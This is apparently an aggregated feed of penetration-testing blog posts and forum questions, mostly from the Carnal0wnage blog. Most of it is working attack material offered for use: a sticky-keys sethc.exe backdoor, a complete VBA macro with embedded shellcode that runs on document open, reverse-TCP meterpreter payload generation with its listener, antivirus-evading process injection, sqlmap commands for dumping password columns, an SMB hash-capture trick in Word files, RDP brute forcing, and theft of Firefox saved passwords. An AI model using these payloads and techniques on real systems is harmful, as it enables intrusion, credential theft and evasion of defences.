copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing
it would probably be nice to sethc.exe back when you are done.
-
-
5:30
»
Carnal0wnage
Several (tm) months back I did my talk on "From LOW to PWNED" at
hashdays and
BSides Atlanta.
The slides were published
here and the video from hashdays is
here, no video for BSides ATL.
I consistently violate
presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.
Post [3] JBoss/Tomcat server-status
There have been some posts/exploits/modules on hitting up unprotected jboss and tomcat servers.
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdfhttp://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.htmlhttp://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/http://goohackle.com/jboss-security-vulnerability-jmx-management-console/http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployerhttp://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploySometimes even though the deployer functionality is password protected the sever-status may not be.
/web-console/status?full=true
/manager/status/all
LOW?
This can be useful to find:
- Lists of applications
- Recent URL's accessed
- sometimes with sessionids
- Find hidden services/apps
- Enabled servlets
- owned stuff :-)
Finding 0wned stuff is always fun let's see
Looking at the list of applications list one that doesnt look normal (zecmd)
Following that down leads us to zecmd.jsp that is a jsp shell
If you are interested in zecmd.jsp and jboss worm it comes from -->
this is a good write up as well as this OWASP preso
https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdfthoughts?
-CG
-
-
14:21
»
Carnal0wnage
scriptjunkie recently had a post on
Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.
-
-
7:17
»
Carnal0wnage
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.
To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 first time around, it will probably give you stuff like this:
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing data
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)
-CG
-
-
21:46
»
Carnal0wnage
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.
I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML file
Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
If this doesnt work for anyone let me know.
-
-
7:47
»
Carnal0wnage
Part II of the articles based on my Hacking Oracle Web Applications talk was posted on EthicalHacker.net today. Head over there to check it out.
Oracle Web Hacking Part II Oracle Web Hacking Part I
-
-
13:22
»
Carnal0wnage
Need to check a few specifc nessus plugins against a host?
$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107
Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...
Host 192.168.1.92 is up
Discovered open port http (80/tcp) on 192.168.1.92
[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92
+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also :
http://www.microsoft.com/Sharepoint/default.mspx Solution : Make sure the proper access controls are put in place
Risk factor : None
Plugin output : The following instance of SharePoint was detected on the remote host :
Version : 12.0.0.6327
URL : http://192.168.1.92/
looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
-
-
8:20
»
Carnal0wnage
I've been busy... :-(
But i do have some upcoming conference speaking engagements coming up.
So. If you are heading to
BruCon
catch me and Joe McCray talk about Pentesting High Security Environments.
If you are heading to DerbyCon
Catch me and
Rob Fuller talk about
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassLastly, if you'll be in Switzerland for
Hashdays
You can catch me talk about
From Low to Pwned.I'll also be giving a talk at the Management workshop on Information Operations for Management (sorry the info isn't on the site yet but should be here
https://www.hashdays.ch/management-session.html at some point).
I'm sure there will be more stuff in November/December its just not scheduled yet.
-
4:12
»
Carnal0wnage
You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.
There are two public options I have found; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexechttp://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload:
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt
Once you have shell you need to migrate out of it, it will be in the shellcodeexec process and as soon as someone ctrl-c or kills that cmd.exe the process dies and so does your shell
Looks like this:
Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspxhttp://www.securestate.com/Documents/syringe.c = Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile “C:\codelocation\cl syringe.c”
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell
-2 is preferred, located explorer.exe inject shellcode into that
C:\Documents and Settings\User\Desktop>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 424 K
csrss.exe 604 Console 0 3,852 K
winlogon.exe 628 Console 0 5,012 K
services.exe 680 Console 0 3,440 K
lsass.exe 692 Console 0 1,408 K
vmacthlp.exe 848 Console 0 2,756 K
svchost.exe 864 Console 0 4,924 K
svchost.exe 944 Console 0 4,308 K
MsMpEng.exe 1040 Console 0 53,812 K
svchost.exe 1076 Console 0 23,780 K
svchost.exe 1164 Console 0 3,616 K
svchost.exe 1368 Console 0 3,916 K
explorer.exe 1624 Console 0 15,256 K
spoolsv.exe 1656 Console 0 6,072 K
VMwareTray.exe 1848 Console 0 5,044 K
VMwareUser.exe 1856 Console 0 6,328 K
msseces.exe 1864 Console 0 10,708 K
jusched.exe 1920 Console 0 4,304 K
msmsgs.exe 1928 Console 0 2,488 K
ctfmon.exe 1952 Console 0 3,248 K
svchost.exe 740 Console 0 3,760 K
jqs.exe 1108 Console 0 1,396 K
vmtoolsd.exe 1264 Console 0 9,976 K
VMUpgradeHelper.exe 1212 Console 0 4,176 K
TPAutoConnSvc.exe 2396 Console 0 4,392 K
alg.exe 2680 Console 0 3,612 K
TPAutoConnect.exe 3060 Console 0 4,848 K
iexplore.exe 3784 Console 0 16,300 K
iexplore.exe 4064 Console 0 45,392 K
wuauclt.exe 1224 Console 0 4,276 K
java.exe 1112 Console 0 27,516 K
java.exe 2520 Console 0 14,272 K
notepad.exe 440 Console 0 3,572 K
jucheck.exe 3112 Console 0 6,120 K
cmd.exe 3260 Console 0 2,700 K
tasklist.exe 3332 Console 0 4,580 K
wmiprvse.exe 3368 Console 0 5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624
Looks like this (you can use the same shellcode in syringe):
-
-
15:41
»
Carnal0wnage
So thanks to mubix for telling me that
ncrack now supports RDP. very cool stuff.
user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10
Fetchfile found /usr/local/share/ncrack/default.pwd
Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST
rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...
Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)
-
-
6:02
»
Carnal0wnage
One of my favorite talks from this year's BlackHat DC was Ryan Kazanciyan's & Sean Coyne's "The Getaway" talk on data exfiltration.
whitepaper:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-wp.pdfslides:
https://media.blackhat.com/bh-dc-11/Coyne/BlackHat_DC_2011_Coyne_Gateway-Slides.pdfEveryone should check out the slides and the whitepaper although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:
1. could your pentest shop emulate an attacker of the level in the case studies.
2. did you or they try to scope the test in order to test things like this...aka do a Full Scope test.
3. if you aren't letting your pentesters go after your network like this how do you think YOUR network will hold up against someone that knows what they are doing?
If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?
We are getting great at
catching our penetration testers (
video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess and you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just
script kiddies with a checkbook and 2. train like you fight, open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.
Instead of making your testers "test' that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed...ask, make, force, them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.
Train like you fight.
-
-
6:03
»
Carnal0wnage
Ben Tomhave has a good post over on his blog
http://www.secureconsulting.net/2010/10/there_is_no_win.htmlgo read it. its short...wont take long, I promise.
In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:
Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).
Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.
Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".
Surviving a network attack is not the same as surviving a mortar attack on a
FOB where if I'm still breathing and have use of my limbs at the end of it i can call that a "win". In turn, its not a successful penetration test or attack if merely "get in" and pop a bunch of shells (see Chris Nickerson's
Top 5 Ways To Destroy A Company talk). Its a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case while the business may have thought they "survived" they in fact "lost".
We're getting really good at teaching our clients how to
catch penetration testers and their methodologies and conditioning them that this a "win" when in fact most times defenders fail to see and catch people with a modified methodology, non public tools, or "non-standard" goals.
-
-
8:51
»
remote-exploit & backtrack
I am busy testing a system and Nessus reports that it is possible to exploit it and from the Nessus output it seems like Nessus was successful, see below. However, I cannot find any information anywhere on how to manually produce this vulnerability. Do not confuse it with the horde of other telnet vulnerabilities out there.
I thought it would be as simple is some of the old telnet environment variable vulnerabilities e.g. telnet -l '-fbin' systemx.com but it does not seem to work, any ideas?
Kerberos telnet Crafted Username Remote Authentication Bypass
Synopsis:
It is possible to log into the remote system using telnet without supplying any credentials
Description:
The remote version of kerberos telnet does not sanitize the user-supplied 'USER' environement variable. By supplying a specially malformed USER environment variable, an attacker may force the remote telnet server to believe that the user has already authenticated.
Risk factor:
High
CVSS Base Score:7.6
CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C
Solution:
Apply the patch below or contact your vendor for a patch :
Plugin output:
It was possible to log in and execute "id" : ];root@systemx:~ [root@systemx ~]# uid=
Plugin ID:
24998
CVE:
CVE-2007-0956
BID:
23281
Other references:
OSVDB:34106
-
-
5:00
»
remote-exploit & backtrack
I had read about the following
1)honey-pots(low interaction and high interaction honey-pots)
2)honey-nets(network of honey-pot's)
3)honey-walls!!(combination of honey-pot + firewall +router +gateway)
I had downloaded some low interaction honeypot system and used it,But i didn't know how can i set-up honey nets or honey-walls
and it's configuration etc..
did you guys have any experience with honey-nets and honey walls and high interaction honey-pots?
If yes can any body tell me where can i learn about them?
and also i heared it is hars for the attackers to detect a honey-wall,because it act as a multi purpose device,So according to me they can not detect it easily ..
I tried on google i ended up with only theory,so decided to ask here...
Hope i will get some ideas here...
-
-
6:31
»
remote-exploit & backtrack
Helle there,
my question is quite short (hopefully the answer is longer^^).
Does anybody know a application to recover a "ssh-private-key-passphrase", to know how strong it is?
greets,
-
-
9:56
»
Carnal0wnage
I covered some of the halflm challenge sniffing stuff in a previous
post.
but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.
so here are some updated links.
where to grab the tables:
http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/where to grab the program:
http://sourceforge.net/projects/rcracki/Some gotchas I ran into on the last PT was some reason getting odd hashes in the
SMB and
NTLM sniffing modules.
in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.
Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000
But I did get smb_login scanned, that was fun:
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
-
-
19:11
»
Carnal0wnage
Got asked to help remotely locate local admins on boxes on a network.
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]
rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
Now you would think that doing a querygroup would give you the right output, but actually you get a:
rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP
Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.
Anyway it takes one more step but you can do it this way:
rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]
rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]
Then you can look up who those SIDs belong to
rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]
rpcclient $> lookupsids S-1-5-21-1214440339- 1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)
rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)
rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine 192.168.242.128 pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT
Not sure about the 512 (its a MS built-in account I think) but the 1003 was the user I added to the local admins group.
-
-
11:58
»
Carnal0wnage
Nothing earth shattering, but since this is a place for my notes...
Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.
So how to do it?
Actually its simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:
key3.db
signons.sqlite
If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.
I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...
-thanks to
Mubix for telling me about this.
-
-
10:01
»
remote-exploit & backtrack
In the millennium series by stiegg larsson, a talented pc user named WASP designs and implements an app named asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute or a single event.
The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?
Getting back to the point though-does anyone have insight into this idea?
-
-
19:19
»
Carnal0wnage
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.
